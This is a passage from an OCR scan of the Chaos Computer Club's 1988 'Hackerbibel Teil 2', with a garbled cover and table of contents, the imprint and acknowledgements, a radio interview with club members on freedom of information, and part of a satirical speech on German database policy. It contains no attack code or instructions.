Vous êtes sur la page 1sur 259

/ V W Ijl p

C H A O S C O M P U T E R CLUB

HACKER
DAS NEUE

BIBEL

T E S T A M E N T

Q
W W
HUtlRHE SOFTURRE FR HERZ.HRI1D BHIRtt

DER GRNE Z W E I G

124


10

Inhack
Daten raus - umsonst und sofort Bericht zur Lage der Nation Chaos Talks eVorstndliche Abmahnung wg. Schaum Indianerspiel zu Ende Daten - Aufzucht und Pflege Funkbastler 1936 Geburtstag: 40 Jahre Transistor Parlakom schachmatt Liebeskranker Roboter 1932 Technik in die Schranken (Weizenbaum-Interview) WELL - ein guter Datenbrunnen Soviet Computer Technology Minus Delta Talks Freedom of Data Processing Phonetapplng Geht den Damen ein Licht auf? Interview mit Deborah L. Brecher Computer b Ein positives feministisches Modell Ich hab auf DV-Fachfrau umgeschult Ein Mailboxbetreiber erzhlt Elektronische Roll-Nomaden Batch-Magic Fun, Profit and Global Suicide Tabellen: Satelliten-Info von Info-Sat Telcom-History 1966 Strahlende Computer Sachverstndige uerung Programmiererdoping Babyboomers and Cyberpunks Megabrain Datenschleudern von 13 bis 25 - nachdrcklich empfohlen

12 17 23 29 31 35 42 44 46 47 52 54 59 78 84
86

89 91 92 94 96
106

110 114 116


122

123
126

128 130 134 140

ab: 13

140 141 144


144

Datenschleudern von 13 bis 25 - nachdrcklich empfohlen Hacker im Europaparlament Heyne Halbschnellschu (Buchrezension)
COSY (Cursor Operating System)

14 15

145 146 146 147 150


150 151

Die Katze darf das! Wohin steuert die Welt?(wo Ist der Abflu? dS) Chaos Communication Congress The Kids Can 't Waitl Viromatpius
T e l e c o n t r o l - w i e g e h t d a s ? (mit 'ner Fernsteuerung; d. Szzer) Trara - d i e Post ist d a ! (hoch auf dem gelben Wagen dS)

151
153

Kinder sind Chaoten


2. Wirtschaftskriminaiittsgesetz(Forts. 16:163)

16

157 158 158 159 159 160 161 162 162 167 169
170 171

Mailboxen sind nicht totzukriegen Hackers von Steven Levy Buchwarnung: MSDOS im Detail Btx-Kostenstelgerung; Btx fr C-64 und BIM Hilfe, Hacker (oh Big BrotherdS) Security against Hackers (gipsnichdS) Satzung des Chaos Computer Club eV EARN / BitNet runtergefahren?! Mailbox und Btx CCC - Partner auf dem Weg zur Informationsgesellschaft(t) Virus RushHour
Laserbrief & A n t w o r t (Stichwort Eilte etc.) S t r a h l e n g e f a h r aus d e m Telefon? (auch 17:177)

17 18 19 20

1 72 173 176 177


182

Entwicklungshilfe: Chaos-Dienstreise nach Graz Postmodemballade Datex-P: Auslsung (Auflsung?! dS) Virusartikel in fnf Teilen aber einer Ausgabe
Volkszhlungsreanonymisierung (auch 18:187)

183 191 192 194 196 197 198

200
21 22 203 208 213 214 215 216
218

Fake-Bombe auf dem Chaos Communication Congress Artware waschmaschinenfester Personalausweis GfA-Basic P r f s u m m e n p r o g r a m m f r w a s c h m a s c h i n e n f e s t e n Erbsubstanz in der Rasterfahndung Der magische Schalter Real Programmer's don't use PASCAL(f2i:208.22:2i9)

Rechtliche Aspekte von Computerviren SPANet Die Knust und ihre Knstler: documenta 8 (vgl. 2 : 1 ) 2 6 2 Telex via Btx Btx-Softwaredekoder fr PC's
Brief aus Kairo (sehr versandet dS)

D a t e n b a n k k o n t r o l l e in USA D i e Q u a t s c h e x p l o s i o n (Lesehilfe zu 22:212)

23

223 224
231

Bits, Bugs und Vaxen Die aktuellen Tarife fr's Hacken (s. 24:241)
R a u b k o p i e n (s. 24:242)

24

236
239

NASA, BkA, Betrachtungen


Schmelzfeste S c h o k o l a d e (Bauplne abgestrzter Ufos)

25

243 244 248 249 251 252 253

Computerbetrug am Automaten Mnzprfer ( r ub l e . S ) da f e nd VAX-Encryption Geheime Nachrichtentechnik und privater Nachrichtenschutz EARN: Erstes Auerirdisches Regional Netz Modemanschlu Argentinische Hacker

impressum
Die Hackerbibel Teil 2 Der grne Zweig 124 Redaktion: Werner Pieper und Herwart Holland-Moritz Redaktion Datenschleuder Schwenckestrae 85 D-2000 Hamburg 13 Datex-P: Geo1 :Chaos-Team BTX:*Chaos Satz:Buchmaschine Heidelberg und WYSIWYG Gestaltung: Ronald Rippchen & Wau Illustrationen: Wenn nicht anders angegeben Chaos Realittsdienst Covergestaltung vorn: Mali & Werner Druck: Fuldaer Verlagsgesellschaft

Herausgegeben von Herwart Holland - Moritz Verlegt von der Grnen Kraft - Medienexperimente
Werner Pieper - D - 6941 Lhrbach

ISBN 3-925817-24-7
Die in diesem Buch verffentlichten Beitrge sind urheberrechtlich geschtzt. Alle Rechte, insbesondere das der Obersetzung in fremde Sprechen, vorbehalten K Teil dieses Buches darf ohne schriftliche Gehnehmigung des Verlages in irgendeiner Form - durch Fotokopie, Mikrofilm oder andere Verfahren - reproduziert o d P e ' n In eine von Maschinen, insbesondere von Datenverarbeitungsanlagen, verwendete Sprache bersetzt werden. Auch die Rechte der Wiedergabe durch Vortrag, Funk- und Fernsehsendungen, im Magnettonverfahren oder hnlichen Wege bleibt vorbehalten. Fotokopien fr den persnlichen und sonstigen Gebrauch drfen nur von einzelnen Beitrgen oder Teilen daraus nur als Einzelkopien hergestellt werden. Jede im Bereich eines gewerblcihen Unternehmens hergestellte oder bentzte Kopie dient gewerblichen Zwecken gern 54 (2) UrhG und verpflichtet zur Gebfihrenzahlun 9 an die VG WORT, Abteilung Wissenschaft, Goetherstrae 49, D-8000 Mnchen 2, von der die einzelnen Zahlungsmodalitten zu erfragen sind. Fr elektronische Informationssysteme (Mailboxen usw.) gelten grundstzlich unsere in GEONET verffentlicheten Verbreitungsbedingungen. Bei Erwerb, Errichtung und Betrieb von Empfngern, Funksprechgerten, drahtlosen Mikrofonen und anderen Funkanlagen, sowie Telefonen und Datenbertragungsgerten und - nicht zu vergessen - Computern, insbesondere bei Eingriffen in das Postretz in der Bundesrepublik Deutschland sind die oelterrt e gesetzlichen und postalischen Bestimmungen zu beachten. "aen Fr Bauanleitungen, Schaltungen und Programme in der Hackerblbel Teil 2 zeichnen die Verfasser bzw. Entwickler verantwortlich. Die Redaktion hat die Manuskripte, Schaltungen und Programme mit grter Sorgfalt {auch juristisch) geprft, kann aber fr Fehler im Text, in Schaltbildern, Aufbauskizzen Stcklisten Programm-Listings usw., die zum Nichtfunktionieren oder evtl. zum Schadhaftwerden von Bauelementen, Anwendern sowie toter und lebender Materie'fhren weder eine juristische Verantwortung noch irgendeine Haftung bernehmen. Smtliche Verffentlichungen in der Hackerbibel Teil 2 erfolgen ohne Bercksichtigung eines eventuellen Patentschutzes, auch werden Warennamen ohne Gewhrleistung einer freien Verwendung bentzt.

impress.bm

Vorwrter, und
trotz scfdagnatimungen

9{acfirweise

Danksaunm
andauernden unverstndlichen HeMalt von datenschleuder und

der nun schon knapp ein Jahr

von redaktionellem Material

kerbibel konnte dieses Werf^ jetzt werden. Zuallererst gilt

wenn auch versptet fertiggestellt

unser 'Dank, den ^Freundinnen des Chaos Computer CluB,

ohne die der HafBi zweiter teil so nicht htte vollendet werden knnen.

Quasi stellvertretend erwhnt sei Herr ckermann, dessen juristische 'Beitrge - gerade zur "Virendiskussion - in verschiedene 'Datenschleuder-Artikel eingingen, ohne da er korrekt namentCich genannt wurde.
Weiter danken zu fr der Zeitschrift 'Koadj Sausalito, Loompanics te Whole larth Review (27 (jte $ CA 94965 USA) sowie dem Besten 'Buchkatalog der Weit,

((Katalog c/o MedieneTqperimente, 6941 Lhrbach) fr permanen-

Inspiration. (Die taz sorgte fr berraschende Lichtblicke - gerade auf der frauen-

seite - und aus vieCen weiteren Quellen zvurde mit freundlicher Genehmigung geschpft. Interviews mit (jCiss

Wir danken Herrn Schumacher unbekannterweise; fr dem TM-Computerheft, mit Weizenbaum

Info 3, mit Timothy Leary Gotting Magical

Stone; "Eva 'Blumenfeld und pd.expra plus demokratische erziehung, 'Elend und Michael zin fr Hutchinson
c r

fr

Megabrain-Infos,

Infosat

- dem Maga-

den freien SA I-TV- Empfangl

Professor Molzberger von der Univerzu Strahlen-

sitt der (Bundeswehr und Carola Schewe (deren 'Ergnzungen de Computer" kider zu spt kamen) und nicht zuletzt Michael

Qreen fr of

die Umscfdagvnnenbiidcr aus dem wunderschnen 'Buch Ihe Zen Art Macintosh". Obwohl Verleger und Herausgeber sich nachdrcklich

bemht haben, die Abbil-

erforderliche 9jacfidrucke.rlau.6nis aller zitierten dungen einzuholen, findig ist es uns nicht gelungen,

Werke und benutzten

alle 'Rechteinhaberinnen aus-

zu machen. Sofern diese uns davon in Kenntnis setzen, werden wir Auflagen als Rechteinhaberinnen

sie selbstverstndlich gerne in zuknftigen gebhrend ausweisen.

Lhrbach / Heidelberg, Juli

1988

Daten raus - umsonst und sofort


Zwei Stunden lang kommen tglich von 10 bis 12 auf SDR3 interessante Leute zu Wort wie der Hamburger Sexualwissenschaftler Wawerzonnek mit seiner These vom multiplen Orgasmus". Am 4. Juni 1988 waren vom COC Andy aus Hamburg und Bernd aus Heidelberg zu Gast bei Moderator Stefan Silier. In der zweiten Stunde ging es um social hacking.
M: Andy und Bernd, ihr gehrt zum Chaos Computer Club. Dieser Club macht unter anderem dadurch Schlagzeilen, da er so etwas wie das Eindringen in die NASA-Computer an die ffentlichkeit bringt. Macht ihr das, um der NASA zu helfen? Pat mal da auf, da das nicht wieder passiert? A: Da gibt es unterschiedliche Motivationen. Einmal gibt es die Motivation des Hackers, der macht das aus Spa. Es ist natrlich auch ein Machtgefhl, wenn man mit seinem 500 Marks-HeimcomputerimWohnzimmersitztundwei,inden Staaten steht irgendwo ein Rechner und da ist man jetzt drin, da bewegt man jetzt auf einer Platine ein paar Bits umher. Das ist schon ein Wahnsinnsgefyhl. Unsere Motivation, Schwachstellen aufzudecken bringt uns auch Probleme. Uns wird auch vorgeworfen, dieTrffelschweineder Software-Industrie zu sein, unter dem Motto: Wir nutzen unser Wissen aus, um die Welt dicht zu machen. Da mssen wir differenzieren: Wir wollen jetzt nicht irgendwie die totale Zugangskontrolle. Wir setzen einen ganz klaren Unterschied zwischen den Datenbereichen zum Beispiel des Militrs, die wie wir meinen, geschtzt sein mssen. Auf der anderen Seite gibt es die Datenbanken, die fr jedermann zugnglich sein sollten. Da fordern wir weltweiten freien Informationsflu. M: Zu welchen Datenbanken zum Beispiel? A: Da gibt es viel Forschung, zum Beispiel Bioforschung. M: Von privaten Firmen? A: Von privaten Firmen, aber nicht nur. Auch von staatlicher Seite. M: Die sagen natrlich: Wir stecken unser Geld darein, das ist unsers. A: Fr die staatliche Seite haben wir das so formuliert: Wir fordern die maschinenlesbare Regierung. Mit Hilfe derComputer und der Netzwerke ist so was einfach mglich. Dadurch ist es mglich, Daten transparent zu machen. Diese Technologie existiert dazu. Es ist nur die Frage, wie sie eingesetzt wird. B: In dieser Beziehung sind die Bundesrepublik oder groe Teile von Europa wirklich noch Entwicklungsland. Seit 1974 gibt es In Amerika das ,.Freedom of Information Act", das jeder Person In den USA erlaubt, Daten, die von der ffentlichkeit in Regierungsstellen flieen, auch wieder abzufordern. Das beinhaltet Volkszhlungsdaten, das beinhaltet aber auch Observationen. In den USA ist es sogar so, da wenn man observiert wird und es mitbekommt, wie das bei der Joan Baez mal der Fall war, da sie ihr gesamtes Dossier auf Grund des ,,Freedom of Information Act" vom CIA zurckfordern konnte und da ein Recht auf Einsicht in Umweltakten besteht. Es wird ja auch hier in der Bundesrepublik registriert, welche Firmen welche Stoffe wo einleiten und mit welcher Berechtigung. Diese Daten werden uns vorenthalten. Und der Ansatz, der jetzt mittlerweile auch von den Grnen und von derSPD gefordert wird, ist ein guter Ansatz, nmlich Einsicht in die Umweltakten. Es ist ja ganz klar: Handeln tut man auf Grund von Informationen; wer keine Informationen ber die Welt hat, ist nicht in der Lage, in dieser Welt richtig zu agieren. Insofern ist es in einer Demokratie unumgnglich, da alle Daten, die von der Regierung produziert oder von der Regierung gesammelt werden, der ffentlichkeit auch wieder zugnglich gemacht werden. M: Aber das ist ein sehr zweischneidiges Schwert. Bei manchen Daten kann ich mir vorstellen, da es sinnvoll ist, wenn die ffentlichkeit, wenn jeder Zugang zu diesen Daten hat. Bei anderen wrde ich doch sehr den Datenschutz in den Vordergrund stellen. A: Das sagen wir ja auch vollkommen klar. Wir fordern ja auch berhaupt nicht, da zum Beispiel der militrische Abschirmdienst alleDaten, die er hat, auf den Tisch legt. M: Meine persnlichen Daten sind ja auch was wei ich berall gespeichert - bis zur Krankenkasse. Da will ich doch nicht, da irgendjemand, der zufllig in dieses System reinkommt, erfhrt, wann ich an welcher Krankheit gelitten habe... A: Richtig, das ist vollkommen verstndlich. Da setzen wir uns auch gar nicht dafr ein, da diese Daten nun jeder bekommt. Aber im Moment ist es so, da eigentlich alles gesichert wird-und das auch mehr schlecht als recht-und das ist, meinen wir, nicht der richtige Weg. B: Man kann es ganz einfach definieren: Die Daten, die die ffentlichkeit betreffen, mssen auch der ffentlichkeit zugnglich gemacht werden. Wenn jetzt jemand sagt, er mu eine neue Umgehungsstrae bauen aus den und den Grnden, weil sich das zum Beispiel aus der Volkszhlung ergibt, dann mu es doch auch mglich sein, da diese Daten, auf Grund derer Regierungsentscheidungen getroffen werden, nachprfbar sind. Diese Nachprfbarkeit ist ein wesentliches Element der Demokratie und unserer freiheitlich demokratischen Grundordnung, da Regierungsentscheidungen kontrollierbar sein mssen. M: Aber das ist ja jetzt nichts, was sich jetzt erst durch das Computerzeitalter ergeben htte. Man knnte die Regierung ja auch dazu verpflichten, das in irgendeinem Buch zu verffentlichen, ansonsten steht jeder ohne einen Computer auen vor.

10

A: Das ist richtig, aber die Entwicklung weist ja in Richtung elektronische Medien. Zum Beispiel: Die Bundesregierung ist auch Anbieterin im BTX-System. Und was sie da an Informationen bietet, ist - ich sag jetzt mal meine Meinung - e i n e Frechheit. Da kommt eigentlich nichts rber, obwohl Im Bildschirmtext die Mglichkeit besteht, da jeder Brger, der an dieses Bildschirmtextsystem angeschlossen ist, Informationen ber irgendwelche Verhandlungen bekommt. Die technischen Voraussetzungen sind da und manchmal nicht da. Insofern ist es schon verstndlich, aber auf Papiermedium ist das alles kompliziert und vor allem teuer. Aber auf den elektronischen Medien ist das sehr einfach, sehr billig und es knnte eingesetzt werden. M: Aber nicht demokratisch, weil nicht jederso ein Ding hat. B: Da wollt ichgrad noch mal drauf eingehen. Wir sind daran gewhnt, da es berall diese kleinen gelben Huschen gibt, in denen man telefonieren kann. Wieso ist es so unvorstellbar, da es gelbe Huschen mit einem Computer drin gibt, wo man seine 5 Mark oder wieviel auch immer reinwirft, und dann die Mglichkeit hat, auf die Daten zuzugreifen. Man mu ja den Computer nicht selbst besitzen. A: Das wollen wir an dieser Stelle auch mal klarstellen: Wir sind fr eine Verkabelung der Welt. Aber ber das Wie und Warum mssen wir uns noch mal unterhalten. M: Ihr habt eben gesagt, wir fordern die Verkabelung der Welt. Unabhngig davon, ob ihr das fordert, wird es dazu kommen - der Weg dort hin ist wohl vorgegeben. Aber das erffnet ja nun auch vielen unangenehmen Begleiterscheinungen Tor und Tr, wie zum Beispiel Wirtschaftskriminalltt. Auf 15 Milliarden schtzt man jetzt schon den jhrlichen Schaden. Und je mehr Leute sich ins Kabel hngen, desto grer Ist die Wahrscheinlichkeit, da manipuliert wird. Wir haben von dem Brsenmakler bei VW gehrt, das ist ja auch ber den Computer gelaufen. Lt sich sowas nicht verhindern, wenn die Sicherungen mal so gut werden, da sowas nicht mehr passiert? B: Dies ist meiner Meinung nach einfach unwahrscheinlich, weil die Systeme von Menschen konzipiert werden, von Menschen betrieben werden und damit ganz einfach'vom Prinzip her nicht sicher gemacht werden knnen. Das ist aber auch gar nicht so sehr der Ansatzpunkt. Wenn wir wie Andy vorhin, von der Verkabelung der Welt reden, meinen wir damit nicht so sehr, da sich alle Wirtschaftsunternehmen verkabeln, sondern wir haben eine ganz andere Perspektive, da nmlich die Linken, sage ich jetzt mal so generell, sich eher technikfeindlich verhalten und es nicht begreifen, da Computer fr sie ein Medium sein knnen, das sie sehr sinnvoll einsetzen knnen. Um mal einen Begriff von Robert Jungk zu benutzen: Wir sind im Chaos Computer Club eine Zukunftswerkstatt. Wir denken ber die Zukunft nach, ber das, was man machen kann, um die Zukunft lebenswert zu gestalten. Und mittlerweile - zum Glck, kann man da sagen - begreifen auch die Brgerinitiativen, da sie Computer einsetzen knnen fr ihre eigenen Zwecke. Es gibt heute beispielsweise schon computer-berwachte Atomanlagen, wo die Brgerinitiativen Megerte aufbauen, die Daten sammeln und dann ber Computer weitergeben. Und die Idee, die jetzt in Mnchen geboren wurde, ist, da man alle Brgerinitiativen, die sich mit Umweltschutz beschftigen, miteinander vernetzt. Dazu mu man sagen: so positiv dieser Ansatz eigentlich ist, so verkennt er doch, was ein Computernetzwerk ist. Der Computer im Netzwerk ist ein Strukturverstrker, so will ich das mal nennen. Das heit, er verstrkt eigentlich nur vorhandene Sozialstrukturen. Wenn Leute, die in ganz verschiedenen Stdten sitzen, schon so nicht

miteinander auskommen und nicht miteinander reden knnen, dann werden sie das mit dem Computer noch viel weniger knnen und es wird in die Katastrophe fhren. Insofern mu, bevor da ein gutfunktionierendes und effizientes Computernetz installiert wer den kann, zuerst die notwendige Sozialstruktur geschaffen werden, damit die Leute dann auch in der Lage sind, den Computer sinnvoll zu nutzen. Das ist berhaupt ein generelles Problem, da meiner Meinung nach in der Gesellschaft mit dem Computer so viel falsch luft, weil der Computer sozusagen vorhandene Strukturen bei uns in der Gesellschaft verstrkt und das mu man schon so sagen - das sind nicht immer sehr glckliche Strukturen. Wenn es darum geht, viel Geld zu verdienen und diese Struktur in der Gesellschaft daist, dann verstrkt das der Computer und provoziert natrlich sowas wie Computerkriminalitt. M: Im Moment noch kein sehr demokratisches Instrument, der Computer. A: Ein Computer ist weder demokratisch noch undemokratisch. . . M: Die Anwendung des Computers frdert im Moment noch nicht die Demokratie. A: Ich will jetzt nicht anfangen, von der Regierung zu reden, aber was da eingesetzt wird bezogen auf die Offenheit gegenber den Brgern, kann man so sehen. B: Die Struktur ist nicht dafr geeignet, da der Computer wirklich demokratisch frderlich wre. Es geht also zuerst darum, das Vorfeld zu bereiten, damit Computer fr diese grundstzlich demokratische Aufgabe genutzt werden knnen. M: Du hast eben konkrete Projekte angesprochen, die jetzt unter den sogenannten Linken laufen, bei Umweltschutzverbnden. Versteht sich euer Blttchen, die Datenschleuder, auch als Medium fr diese Projekte? B: Es heit ja, die Datenschleudecistdas wissenschaftliche Fachblatt fr Datenreisende. Und in dem Sinne verstehen wir uns als Wissenschaftler. Wissenschaftler wird man nicht dadurch, da man an irgendeiner Universitt irgendeinen Abschlu macht, sondern Wissenschaftler ist der, der sich kompetent zu Sachen uern kann. Dieses Wissen wollen wir sinnvoll einbringen und dazu benutzen wir verschiedene Medien. Das ist zum einen die Datenschleuder, die erscheint unregelmig. . . A : . . .in Papierform. Das ist auch wichtig. Leute, die da nicht irgendwie mit ihrem Computer was machen, denen das auch zugnglich zu machen. Die Datenschleuder versteht sich auch nicht so sehr als Fachblatt in dem Sinne, da da die neusten technischen Ddelfazzes ausgetauscht werden, sondern als Informationsblatt ber - na sagen wir mal - den Stand der Entwicklung oder so. B: Dann gibt es noch zusammenfassend die Hackerbibel die erste Bibel mit Fortsetzung, der zweite Teil wird voraussichtlich zur Buchmesse verfgbar sein - , das ist eine Zusammenfassung von dem, was wir machen. Das ist nicht so sehr die Zukunftsperspektive, sondern State of the art", darzustellen, wie weit wir im Moment sind. (Und dann war die Sendezeit leider um...

Fr die Hackerbibel Teil 2 wurde obiges, leicht redigiertes Gesprchsprotokoll angefertigt)

Dieter Schumacher

Bericht zur Lage der Nation im geteilten FIZ-Deutschland


Abstract
Es ist nicht genug zu wissen, man mu auch anwenden; es ist nicht genug zu wollen, man mu auch tun.

Johann(W)Wolfgang(W)Goethe

Herr Prsident, Herr Bibliotheksdirektor, Verehrte Krperschaften, Persnlichkeiten und Ministerialrte, Vertreter der Geistlichkeit und ideologieverwandter Berufe, Eminenzen, Resistoren, Impedanzen und Suszeptibilitten, Rote und Schwarze, Realos und Fundis, Ruhegehaltsfhige Mitbrger und sonstige Beihilfeempfnger, Mittelstndler und Existenzgrnder, Liebe Online-Gemeinde! Unsere diesjhrige kumenische Feierstunde fr Kommerzielle und Nichtkommerzielle steht wieder unter einem Wort des Herrn (Helmut Kohl), der uns am 18.3.1987 in seiner Regierungserklrung zurief: Die Schpfung bewahren - die Zukunft gewinnen - Online recherchieren! Die Epistel des heutigen Tages steht geschrieben in Joh. 1,1:1m Anfang war das Pawort, und das Pawort war beim Host. Die Kollekte am Ausgang ist bestimmt fr die Hinterbliebenen derjenigen vom BMFT gefrderten IVS-Neugrndungen, die nach Ablauf des Frderungszeitraums noch keine schwarzen Zahlen schreiben. Sie wird der Liebe der Gemeinde empfohlen. Dieser erste Bericht nach der Winterwahl des Jahres 1987 steht noch ganz unter den Nachwirkungen der Regierungsbildung und des mhsamen Ausklammerns echter inhaltlicher Aussagen in den Koalitionsvereinbarungen. Whrend die Spitzensteuerstze und die Sicherheitsgesetze heftig umstritten waren, bestand Konsens darin, das laufende luD-Programm 85-88 ber 1988 hinaus um weitere 4 Jahre zu verlngern und eine Fortschreibung erst in der nchsten Legislaturperiode vorzusehen. Es sei - so die einhellige Meinung der Verhandlungspartner - damals meisterhaft so ausgewogen ausformuliert worden, da der berwiegende Teil der inhaltlichen Aussagen auch bis in die frhen 90er Jahre noch Bestand haben drfte, auch bei dann vernderten Randbedingungen. Es sei auch der Beamtenschaft des Bundes und der Lnder nicht zuzumuten, nun in Krze schon wieder den Stre einer derartigen Konsensbildungsstrapaze auf sich zu nehmen, zumal sie vorerst auch noch fr produktive Ttigkeiten zur Verfgung stehen mten. Bis 1992 seien die zustndigen Damen und Herren dann hinreichend regeneriert und befrdert, da sie mit neuem Elan an das luD-Programm zur Jahrhundertwende gehen knnten. Auch der bisher zustndige verdienstvolle beamtete Staatssekretr wurde vorsorglich in den einstweiligen Ruhestand versetzt, damit seine luD-orientierte Dynamik diese Zeitplne nicht unterwandert und damit er sich seinerseits ohne die Last des politischen Tagesgeschfts auf die dann anstehenden Aufgaben konzeptionell vorbereiten kann. Fr eine Fortschreibung erst Anfang der 90er Jahre sprach auch der Umstand, da dann die aktuellen Bevlkerungsdaten aus der jetzt laufenden Volkszhlung auf den Tisch liegen, da die Sptfolgen des Pillenknicks berschaubar werden und da der Bundesminister fr Wirtschaft seine Grundsatzberlegungen abgeschlossen hat, so da dann Bedarfsuntersuchungen auf gesicherter Grundlage erstellt werden knnen, fr welche die nachgeordneten Institute bereits heute Personal vorhalten. Im Bereich der inneren Sicherheit soll einvernehmlich ein Vermummungsverbot beim Recherchieren erlassen werden; die Koalitionre sind der Ansicht, man solle nicht lnger seine Freude ber gefundene Hits der ffentlichkeit vorenthalten. Eine Novellierung des Bundesdatenschutzgesetzes und des Verwaltungsverfahrensgesetzes soll auf Wunsch von Minister Zimmermann

die Zusammenarbeit zwischen den FlZen und den Sicherheitsorganen verbessern; er verspricht sich von einer berwachung der Recherchenthemen Hinweise auf recherchierende Verfassungsgegner. Schlielich wird das Gesetz ber den militrischen Abschirmdienst sicherstellen, da Ostblocksearcher bei uns keine SDI-Profile plazieren. Der Bundesminister fr Justiz mute entgegen frheren Plnen im Amt bleiben, da er immer noch nicht den Eingangsdialog zu JURIS beherrscht, geschweige denn die Markteinfhrung. Ferner konnte die rechtzeitig vor der letzten Landtagswahl angekndigte Sitzung der JURIS GmbH nach Saarbrcken noch nicht vollzogen werden. Man hebt sich das jetzt fr die nchste Wahl auf, um dann Anla fr eine schne pressewirksame Erffnungsveranstaltung zu haben. Mittelbar davon betroffen ist auch der weiterhin mit Spannung erwartete Termin fr den Besuch des Staatsoberhaupts der Deutschen Demokratischen Republik: Herr Honecker mchte im Saarland nmlich auch einen Blick in JURIS tun und sich einmal online veranschaulichen, was einen Rechtsstaat ausmacht. Auch der Bundesminister fr Wirtschaft mute aus luD-Grnden im Amt bleiben, weil die von ihm seinerzeit vergebenen luD-Studien nun noch erst implementiert werden mssen. Immerhin hat er mit diesen Studien erreicht, da die damit beauftragten, ihm nachgeordneten Institute mittlerweile Grundkenntnisse im Recherchieren erwerben konnten. Die Erhebungen der Institute bei den sachkundigen Privatfirmen haben dort zu einem Verdienstausfall von einigen 10.000 DM gefhrt, die steuerlich nicht als auergewhnliche Belastungen abgesetzt werden knnen. Wie rasch der BMWi Studienerkenntnisse in Manahmen umsetzt, zeigt sich im Bereich der Informationsversorgung mittelstndischer Unternehmen: Kaum hatte er erfahren, da Mittelstndler Informationen lieber am Stammtisch als am Terminal einholen, wurde der Beschlu gefat, den IVS des BMFT ein bundesweites Netz von Searchkneipen entgegenzusetzen. Dort sitzt whrend der ffnungszeiten ein FIZ-Mitarbeiter mit Portable am Tresen und reicht OnlineRecords mit Pils oder Alt. Die Fakultt fr Brauereiwesen der TU Mnchen in Weihenstephan erstellt derzeit die obligate Bedarfsanalyse. Hoppenstedt reagiert sensibel auf diese Marktchance und bringt eine Kundenzeitschrift heraus unter dem Titel "Cogito, ergo bibamus". Im Geschftsbericht des BMZ wurde dem deutschen Volk abermals ein Minister zugemutet, der die Datenbanken SCAN-A-BID und CAB nicht kennt. Minister Klein teistete freilich zunchst einmal Entwicklungshilfe im Inland sdlich des GOLEM-quators: Ein schon vom BMWi mit Fortbildungsstudien betrautes Wirtschaftsforschungsinstitut in Mnchen erhielt nun auch noch entgeltlich Gelegenheit, sich ber Datenbanken mit Entwicklungslnderrelevanz sachkundig zu machen. Anders als der BMWi verfgte der BMZ jedoch zunchst eine ffentliche Ausschreibung, um bei den Insidern im Wege der kostenlosen Angebote Anregungen fr die inhaltliche Ausgestaltung der Studie einzuholen. In seinem Amtseifer ist es freilich dem Minister entgangen, da bei einer Ausschreibung nach VOL nach herrschender Lehre keine gemeinntzigen Auftragnehmer bedacht werden drfen. Derartigen fortgesetzten grob unbilligen Wettbewerbsverzerrungen zwischen ffentlichen und privaten Anbietern will der Bundesminister der Finanzen nunmehr einen Riegel vorschieben: Knftig wird nur noch unterschieden zwischen kommerziellen Anbietern 1, Art (ffentliche und gemeinntzige Institute, die keine Ahnung von Gemeinkosten haben) und solchen 2. Art, die ehrlich ihre Kosten ermitteln. Erstere erhalten bei Ausschreibungen pauschal einen Angebotszuschlag von 80%. Nicht nur Minister Klein, sondern auch Rita Smuth zeigt eine zunehmende Sensibilitt gegenber Online-Diensten: Den zahlreichen Pfeifenrauchern in der Online-Szene hat sie ein sogenanntes Raucherterminal angekndigt, mit eingebautem Aschenbecher und Dunstabzugshaube. Mit diesem Equipment wird einerseits den Pipe Searchern die Lust am Recherchieren erhalten, whrend andererseits die nikotinarmen Rechercheure frei von Umweltbelastungen ihrem Gewerbe nachgehen knnen. Sie legte ferner einen Bericht des Bundesgesundheitsamtes vor, wonach die in Onlinekreisen weit verbreiteten Search Aids unter epidemiologischen Gesichtspunkten unbedenklich sind. Diese Aids-Form kann zwar bei weniger robusten Searchern zu einer gewissen Immunschwche gegen bestimmte Hosts fhren. Es besteht jedoch kein ffentliches Interesse daran, diesen Personenkreis dagegen amtlich zu schtzen. Unbeschadet dessen werden sich knftig Searcher im Freistaat Bayern, sofern sie im ffentlichen Dienst beschftigt sind, regelmig Aids-Reihenuntersuchungen unterziehen mssen. Der Bundesminister fr Forschung und Technologie nutzt die schpferische Pause zwi-

sehen zwei luD-Programmen zur Verbesserung der luD-Rahmenbedingungen sowie zur Schaffung symboltrchtiger und marktfrdernder Infrastruktureinrichtungen: Nachdem Plne milungen waren, die GID FR 1 DM an einen Berliner Brotfabrikanten zu veruern, wurden mittlerweile andere potente Anteilseigner gefunden, denen der Einstieg in die Gesellschaft durch auerordentliche Ertrge auf Zeit geebnet wurde. Nun ist man dabei zu klren, mit welchen Aufgaben dieses Spezialistenteam betraut wird. Die wirtschaftliche Stellung privater Informationsvermittler soll durch ein Berufsmonopol abgesichert werden, hnlich wie sich auch bereits die Arbeitsmter, rzte, Anwlte und Apotheker vor unliebsamer Konkurrenz schtzen. Danach soll Informationsvermittlung nur der betreiben drfen, der von einer Industrie- und Handelskammer als qualifiziert angesehen und insoweit vereidigt wird. Die Bonner Bannmeile um das Bundeshaus herum soll zu einer IVS-freien Zone erklrt werden, da in diesem Umkreis ohnehin niemand Online-Dienste nutzt und eine IVS-Aktivitt die Beamten und Parlamentarier nur stren wrde. Auch im neuen Deutschen Bundestag sitzt wieder kein Abgeordneter mit Online-Kenntnissen. Die Bemhungen der Bundestagsverwaltung, ausgewhlte Abgeordnete mit Online-Wissen auszustatten, drfte daran scheitern, da keine Stellen bewilligt werden und da eine Informationsversorgung nur einzelner Abgeordneter gegen den Gleichheitsgrundsatz in der Verfassung verstt. Sodann soll im Regierungsviertel ein Denkmal fr den unbekannten Searcher errichtet werden. Es trgt die Inschrift "LOGOFF" und gibt Besuchern auslndischer Hosts Gelegenheit, durch eine Kranzniederlegung dem bundesdeutschen luD-Wesen ihr Mitgefhl auszudrcken. Eine bisher im niederrheinischen Kevelar angesiedelte Devotionalienhandlung wird hier einen Flohmarkt einrichten, in dem alte Manuals und Blue Sheets aus der jngeren deutschen luDGeschichte gehandelt werden. Schlielich ist der BMFT sich auch seiner sozialpolitischen Verantwortung bewut und wird ein Searcher-Genesungswerk einrichten, unter dem Namen "Carriage Return e.V.". Hier knnen nicht ruhegehaltsfhige Altsearcher eine Bleibe fr den Lebensabend finden und in vertrautem Kreise GRIPS und GOLEM miteinander spielen. Nachdem Elly Heuss-Knapp, Wilhelmine Lbke und Hannelore Kohl bereits hnliche karitative Aufgaben bernommen haben, konnte fr die Schirmherrschaft des Carriage Return e.V. Beatrix Riesenhuber gewonnen werden. In seinen Bemhungen, sich frhzeitig fr das Amt des FDP-Vorsitzenden zu profilieren, hat sich Minister 